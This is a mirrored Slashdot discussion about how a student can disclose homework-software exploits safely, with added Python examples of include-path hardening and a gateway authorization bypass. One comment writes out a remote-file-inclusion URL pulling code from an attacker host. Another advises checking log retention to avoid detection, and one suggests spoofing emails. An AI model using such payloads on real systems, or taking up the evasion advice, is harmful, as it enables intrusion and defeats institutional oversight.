Slashdot Mirror


Disclosure of Major Software Exploits by Students?

school-hacker asks: "I am a U.S. university student who has recently come across 2 remote exploits for a homework program used by colleges nationwide. Both vulnerabilities allow students to give themselves arbitrary scores, and possibly execute arbitrary code. To further emphasize the scope of this vulnerability, I have written and self-tested proof-of-concept exploit code. Naturally, I want to share this information with their software engineers, and would even be nice enough to suggest a means of fixing it. However, with the state of current intellectual property and reverse-engineering laws, I hesitate to do so out of fear of litigation or academic disciplinary action. As an ethical geek, what do *you* do?" While the responses to an earlier story might prove useful here, there is always the possibility of the university making things harder for the person reporting the problem. How can students avoid both legal and academic trouble when trying to notify their university of security problems?

15 of 503 comments

  1. Blackboard by zerocool^ · · Score: 5, Informative

    This probably has to do with "blackboard" software, i.e. learn.vt.edu.

    This software tries to be everything to everyone, and all most teachers use it for is posting grades.

    It doesn't surprise me that there are bugs in it, though. There have been several show up on astalavista.box.sk, and those were fixed, but the design of the program doesn't strike me as being particularly sound.

    ~Will

    --
    sig?
  2. The standard way. by Popsikle · · Score: 3, Informative

    Being a member of the security scene (not a very skilled member, but I'm trying! ;) ), the standard way would be to email the vendor. If you want to do it anonymously, PM me and I can set you up a POP3 account ;) Briefly state the issues and the holes, how the exploit works, and inform them that if no response is made you will forward the exploit and the security brief to the proper mailing lists. It is law in California now that any security breach must be made public, so just remind them of that. Normally they will respond asking for further details; forward them your proof-of-concept and again warn them that if corrective measures are not made you will announce it publicly. It should result in a patch, in which case make your findings public with information on how to patch or where to obtain the patch for the software.

    If all communication fails there are the [FULL-DISCLOSURE] and the [INCIDENTS] mailing lists. Again, if you are worried about your school and/or IP laws, the best thing would be to spoof an email to the lists (if it comes down to that) or use an email account that your name IS NOT attached to. Most companies will thank you for informing them before going public, and it is the right thing to do =) Also try digging through your AUP and TOS for the network at school; it may state some legalities about breaking into systems, hacking, sniffing, etc.

    If all else fails, forward your findings to a trusted source and have them take the actions required. Remember you are not required by any law to make your findings public, so if you really feel uneasy just forget about the whole thing.

  3. Re:the Slashdot way by The+Old+Burke · · Score: 5, Informative
    Or use husmail.com
    Send the mail with exploit to abuse/contact/CEO@companywithexploit.com
    Tell them that you will release the exploit within 30/60/90 days on Bugtraq, Freenet and Slashdot unless they fix it.

    Make sure you also send the mail to:
    -Local/regional newspapers.
    -The school/school council/principal/teachers/newspaper.
    -Local government official(s).

    If they don't fix the shit after this, release the exploit *anonymously*.

    --
    Proud patriot and republican voter.
  4. Re:Had this problem with SUN by Anonymous Coward · · Score: 2, Informative

    They were running a comment system that did server side includes. The URL pattern was

    http://java.sun.com/foo.jsp?url=relative/path.inc


    I'm not sure if this was the case here, but this can be far more dangerous in some cases, since you can do off-server includes (in PHP at least).

    This means you could do something like:

    http://java.sun.com/foo.jsp?url=http://www.hax0r-site.com/mycode.inc

    And it would execute "mycode.inc" on their server, meaning you could run *arbitrary* code on their server. That's a big hole a lot of web developers don't catch.
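The include-by-parameter pattern described in this comment, as an added example (not code from the thread, from Sun, or from any product named on this page): a resolver that passes the `url` parameter straight through, beside one that accepts only a relative `.inc` name under a fixed include directory. The parameter name and the `.inc` suffix come from the comment; the include root `/srv/www/includes`, the suffix allow-list and the sample requests are assumptions made for the example.

```python
"""Include-by-URL-parameter: the vulnerable resolution beside a hardened one.

Models the ``foo.jsp?url=relative/path.inc`` pattern from the comment above.
Nothing here touches the network or the disk; each resolver only decides
*what the server would load*, which is where the bug lives.
"""
import os
from urllib.parse import urlsplit

INCLUDE_ROOT = "/srv/www/includes"   # assumed include directory (POSIX paths)
ALLOWED_SUFFIXES = (".inc",)         # assumed: only .inc fragments are includable


def resolve_include_vulnerable(param: str) -> str:
    """The naive include: trust the parameter as given.

    A value carrying a scheme comes back untouched, so a runtime that treats
    'http://...' as an includable resource (PHP with allow_url_include on, as
    the comment notes) fetches and executes attacker-hosted code. Relative
    values are joined without normalisation, so '../' traversal passes, and
    an absolute value ('/etc/passwd') replaces the root outright because that
    is how os.path.join behaves.
    """
    if urlsplit(param).scheme:
        return param
    return os.path.join(INCLUDE_ROOT, param)


def resolve_include(param: str) -> str:
    """Hardened: the parameter may only name a file under INCLUDE_ROOT with an
    allowed suffix; anything else raises ValueError.

    Containment is checked lexically (normpath + commonpath) so the answer does
    not depend on what exists on disk. A NUL byte is rejected because C-level
    file APIs stop at it and would open a different name than the one checked.
    ``param`` is assumed to be already URL-decoded by the web framework.
    """
    parts = urlsplit(param)
    if parts.scheme or parts.netloc:
        raise ValueError("remote include rejected")
    if "\x00" in param or os.path.isabs(param):
        raise ValueError("absolute path or NUL byte rejected")
    candidate = os.path.normpath(os.path.join(INCLUDE_ROOT, param))
    if os.path.commonpath([INCLUDE_ROOT, candidate]) != INCLUDE_ROOT:
        raise ValueError("path escapes include root")
    if not candidate.endswith(ALLOWED_SUFFIXES):
        raise ValueError("file type not includable")
    return candidate


def is_allowed_include(param: str) -> bool:
    """True if the hardened resolver would accept ``param``."""
    try:
        resolve_include(param)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # Constructed requests: the comment's two URLs plus the usual variations.
    for value in ("relative/path.inc",
                  "http://www.hax0r-site.com/mycode.inc",
                  "//www.hax0r-site.com/mycode.inc",
                  "../../etc/passwd",
                  "/etc/passwd",
                  "header.inc\x00.txt"):
        verdict = "ALLOW " + resolve_include(value) if is_allowed_include(value) else "DENY"
        print(f"{value!r:42} naive -> {resolve_include_vulnerable(value)!r:46} hardened -> {verdict}")
```

The hardened resolver refuses `//host/path` as well as `http://...`, since a scheme-less network path is still a remote reference to many runtimes, and it gives the same answer whether or not the file exists. What it cannot fix is a runtime that follows URLs in `include()` at all; in PHP that is `allow_url_include`, which should be off regardless of how the parameter is validated.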

  5. That's how Stefan Puffer got indicted by rfmobile · · Score: 2, Informative

    That's exactly how Stefan Puffer got indicted in Houston, Texas last year. He provided a demonstration of an insecure county wireless system in front of a newspaper reporter and a county IT employee. He was later no-billed by the county but I'm sure his attorney's bill was a few $$$. -rick

  6. blackboard? not necessarily.. by Mobster75 · · Score: 5, Informative

    Sure, it's probably Blackboard which most colleges use, but if it's not Bb, it could also be Banner by SCT which plenty of schools also use.

    Compromising Banner is far more dangerous than Blackboard (Bb).... Most schools that use Banner use it as their student management system, which records official transcript, program requirements met, class registration, etc. etc.

    In my last undergrad semester, my team developed a website that interfaced directly w/ the Banner system and even found some loopholes in it which we exploited to allow our website to do a better job at calculating program requirements met and suggested offerings to complete it. (This was for an Advanced Software Project Mgmt class)

    Needless to say, the Registrar's office people were very intrigued by our exploration into the limits of the current system. I imagine a less cooperative school administration would be more punitive.. (But I went to a business school, so they know we just get motivated by $$ ;) )

    1. Re:blackboard? not necessarily.. by calethix · · Score: 4, Informative

      I've found what I would consider security issues in Banner's web products before. Stuff that if you pass the correct variables to it, will display information from the database without doing any kind of user validation.
      To understand the issue, you have to know that it uses Oracle Application Server which basically lets you execute packages in the database. All of the main web packages do user validation but some of them call other packages to display the content of the page (which don't always do validation).
      So, if you know what variables to pass to said packages, you can bypass their security. SCT told me that since those were only supporting packages, they were functioning properly and they wouldn't do anything to change them.
      Granted, you have to have a pretty in depth knowledge of how their web products work but that's a good number of employees at any school using Banner. We have access to all of the package/program source so we can customize it for our university's needs.
      Oh well, I've ranted about SCT enough. :)
      What was funnier though was when I discovered that our database had execute any procedure granted to public, i.e. the web user. That essentially opened up any database procedure to be executed by an anonymous user via the web. I think that one was our fault instead of SCT's and it was fortunately taken care of fairly quickly.
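The situation calethix describes, as an added example in stand-in Python (not Banner, SCT or Oracle code): a gateway that calls any stored procedure by name, a "main" procedure that checks the session, and a "supporting" procedure it calls that does not, so requesting the helper directly skips the check. Two fixes sit beside it: dispatching only an allow-list of entry points through the gateway (Oracle's mod_plsql has its own configuration for this, a request validation function and an exclusion list; the allow-list here stands in for that), and having helpers accept only an authenticated principal object rather than a raw identifier. The package and parameter names (`pkg_main`, `pkg_support`, `student_id`), the student records and the session are all invented for the example.

```python
"""PL/SQL-gateway style dispatch: the exposure from the comment above, beside
two fixes. Stand-in code written for this example; none of it is Banner's,
SCT's or Oracle's. A URL path names a stored procedure and the gateway calls
it with the query parameters as arguments; 'main' procedures check the
session, the 'supporting' ones they call do not. If the gateway will call
*any* procedure by name, the helpers are reachable directly.
"""
from dataclasses import dataclass
from typing import Callable, Dict, FrozenSet, Optional

# Constructed sample data, not real records.
STUDENTS = {
    "1001": {"name": "A. Student", "transcript": ["CS101 A", "CS201 B"]},
    "1002": {"name": "B. Student", "transcript": ["CS101 A", "CS301 A"]},
}
SESSIONS = {"sess-abc": "1001"}  # session cookie -> authenticated student id


class Unauthorized(Exception):
    pass


def render(student_id: str) -> str:
    rec = STUDENTS[student_id]
    return f"{rec['name']}: " + "; ".join(rec["transcript"])


# --- As described: the supporting procedure trusts a raw identifier --------
def display_transcript(student_id: str) -> str:
    """Supporting procedure (hypothetical name): renders whatever id it gets."""
    return render(student_id)


def view_transcript(session: str) -> str:
    """Main procedure (hypothetical name): the only place the session is checked."""
    student_id = SESSIONS.get(session)
    if student_id is None:
        raise Unauthorized("no valid session")
    return display_transcript(student_id)


PROCEDURES: Dict[str, Callable[..., str]] = {
    "pkg_main.view_transcript": view_transcript,
    "pkg_support.display_transcript": display_transcript,
}


def make_gateway(procedures: Dict[str, Callable[..., str]],
                 exposed: Optional[FrozenSet[str]] = None):
    """exposed=None: every procedure is callable by name (the comment's
    situation). Otherwise only the allow-listed entry points are dispatched."""
    def gateway(path: str, params: Dict[str, str]) -> str:
        if exposed is not None and path not in exposed:
            raise Unauthorized(f"{path} is not reachable through the gateway")
        return procedures[path](**params)
    return gateway


# --- Fix 1: dispatch only an allow-list of entry points --------------------
EXPOSED = frozenset({"pkg_main.view_transcript"})


# --- Fix 2: helpers take an authenticated Principal, never a string --------
# Query-string text becomes a Principal only via authenticate(), so a helper
# exposed by mistake still has nothing it can be tricked into rendering.
@dataclass(frozen=True)
class Principal:
    student_id: str


def authenticate(session: str) -> Principal:
    student_id = SESSIONS.get(session)
    if student_id is None:
        raise Unauthorized("no valid session")
    return Principal(student_id)


def display_transcript_v2(who: Principal) -> str:
    if not isinstance(who, Principal):
        raise Unauthorized("helper called without an authenticated principal")
    return render(who.student_id)


def view_transcript_v2(session: str) -> str:
    return display_transcript_v2(authenticate(session))


PROCEDURES_V2 = {"pkg_main.view_transcript": view_transcript_v2,
                 "pkg_support.display_transcript": display_transcript_v2}

gateway_open = make_gateway(PROCEDURES)                  # as found
gateway_allowlisted = make_gateway(PROCEDURES, EXPOSED)  # fix 1
gateway_open_v2 = make_gateway(PROCEDURES_V2)            # fix 2 alone, gateway still open


def probe(gateway, path: str, params: Dict[str, str]) -> str:
    """The rendered page, or 'DENIED' if the gateway or procedure refused."""
    try:
        return gateway(path, params)
    except Unauthorized:
        return "DENIED"


if __name__ == "__main__":
    steal = ("pkg_support.display_transcript", {"student_id": "1002"})  # someone else's record
    print("open gateway:        ", probe(gateway_open, *steal))
    print("allow-listed gateway:", probe(gateway_allowlisted, *steal))
    print("typed helper, open:  ", probe(gateway_open_v2, "pkg_support.display_transcript", {"who": "1002"}))
```

The "execute any procedure granted to public" finding in the same comment is the same exposure one layer down: it widens the set of callable procedures from the application's packages to every procedure in the database. On Oracle, `SELECT grantee, privilege FROM dba_sys_privs WHERE grantee = 'PUBLIC'` lists the system privileges PUBLIC holds, which is where that grant shows up.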

  7. Post the info anonymously on Freenet by Tracy+Reed · · Score: 2, Informative

    Freenet Project

    And then give yourself an A. :)

  8. Re:if blackboard by zerocool^ · · Score: 2, Informative

    Or cross-site scripting vulnerabilities. I think it uses php, also, maybe. Not sure.

    I am sure that it uses POST instead of PUT.

    ~Will

    --
    sig?
  9. Re:Give Yourself an A by nametaken · · Score: 3, Informative

    As far as legal counsel goes, I think it would be both cheap (and kinda funny) if you use the free legal advice offered by the campuses themselves to determine a course of action.

    Nearly every campus has free legal advice consultation for students.

  10. You are already in serious trouble. by The+Revolutionary · · Score: 3, Informative

    If you have done what I think you have, then you are quite probably screwed no matter what course of action you choose.

    If you do report the problem, the IT administrators will be obliged to perform a damage assessment. They will scan their logs for behavior possibly taking advantage of this exploit. You say you have proof-of-concept code and presumably have tested it; if IT discovers that you have so much as tried to take advantage of this or a related exploit, it will almost certainly result in your dismissal for that semester, criminal charges, and possibly the end of your academic career.

    It won't help to go through a professor. If IT comes back and says that they have evidence that you tried to take advantage of the exploit (by 'testing'), you will not be spared, and the professor will either be unwilling or unable to protect you.

    If you do not report the problem, you risk IT discovering the exploit on their own or through a security update from the vendor, and similarly performing a damage assessment to discover whether or not their systems or data have been compromised, or whether an attempt was made.

    Don't scoff at this. If it is a significant exploit, and given that there is now a story on Slashdot about it, there is a significant possibility that IT will perform a damage assessment.

    Further, depending upon how you found or 'tested' this exploit, IT may find you out whether or not they realize or are alerted to the nature of the exploit.

    It is really up to you. Only you know the nature of your investigative activities and testing. If discovering these exploits required behavior which went beyond the normal use of the system, then you have a very serious problem.

    How do you explain why you were doing this in the first place? You can't, and quite honestly, there is almost certainly no excuse for it. If you were concerned about the security of the system, you should have gone through official channels to get clearance to look for vulnerabilities, and report the sort of investigative techniques you would be using, and do only this.

    If you have not done this, then you have one course of action:
    - Find out how long of a period IT keeps logs for. If you are a technically inclined student, then surely you have acquaintances -- students -- who work in IT.
    - If the logs of your activity are gone, then you are in the clear. Report the vulnerability anonymously the next time you are off campus. Unfortunately, from the few academic IT departments I am familiar with, they keep logs for a very long time, because of issues just like these.
    - If, on the other hand, the logs of your activity are not gone, then weigh the possibility of your activity being found out before the logs will be cycled or destroyed.

    If the logs will be around for months still, then you are quite possibly in serious trouble. If the logs will be around for a year or more, then you are almost certainly in very serious trouble.

    If you report your activities, then you are almost certainly in very serious trouble.

    Personally, I would go with the first option, and hope that your IT department will not perform a damage assessment, or that they will not find out about the exploit until next semester, and will not be interested in logs from the previous semester, or perhaps from the previous academic year.

  11. Re:the Slashdot way by syukton · · Score: 2, Informative

    hushmail.com you mean?

    --
    Reinvent the wheel only at either a lower cost, greater effectiveness, or your own personal enrichment and satisfaction.
  12. Contact Me by jsnider · · Score: 5, Informative

    I'm making the assumption that the software you found a problem in is Blackboard. I apologize if that is not the case; however, I would still be happy to take your discovery to the vendors of whatever software it is on your behalf.

    I work for a major university as the Blackboard programmer/administrator. I've been working on the Blackboard code for years, making substantial modifications to the Bb system to suit our university. I've found my share of bugs, problems, and more than one gaping hole. Blackboard is riddled with XSS, input validation, SQL insertion, replay, predictable sequences, and I'm sure countless other vulnerabilities. Quite frankly I'm amazed at how few breaches I hear about.

    I think you're right to be careful, but try not to get carried away. At least in our department, we're eager to hear about problems and fix them. We're not interested in ruining someone's college education. However, you should be careful about who you contact. At our university, the usual IT people are paranoid. You need to get as close to the people who deal with Bb as you possibly can. Contacting a suit in upper IT would likely get you the slapdown. Start lower. You're looking for the geeky programmer who deals with Bb all day long and would drop everything they are doing to fix a hole in their system.

    If you are not comfortable contacting representatives at your university, feel free to contact me about your discovery. This sort of stuff is what I do, and besides, I'm already on Blackboard's shit list. I have another issue to report to Bb (the aforementioned gaping hole) and I'd be happy to send your information along with it, with or without your name. jeff (somewhere near) jsnider.net

  13. Re:if blackboard by glob · · Score: 2, Informative

    i've installed blackboard more than once.

    it's mainly perl (on apache with mysql).

    one component (tutornet) is java.

    --
    nostrils
  14. Tell CERT about it by Anonymous Coward · · Score: 1, Informative

    Simple, submit the info of the exploit and fix to CERT and they will take care of the rest.